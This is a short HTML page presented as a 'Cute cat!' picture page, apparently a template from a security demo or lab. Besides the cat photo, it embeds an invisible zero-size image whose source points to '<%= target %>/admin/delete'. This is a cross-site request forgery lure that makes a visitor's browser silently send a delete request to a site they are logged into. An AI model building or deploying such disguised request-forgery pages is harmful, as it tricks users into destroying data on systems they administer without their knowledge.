<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Cute Cat!</title>
  </head>
  <body>
    <h1>Cute cat!</h1>
    <p>Nuh really look at this cute cat @_@</p>
    <img
      src="https://www.sciencenews.org/wp-content/uploads/2019/07/072319_ee_cat-allergy_feat.jpg"
    />
    <img src="<%= target %>/admin/delete" width="0" height="0" />
  </body>
</html>
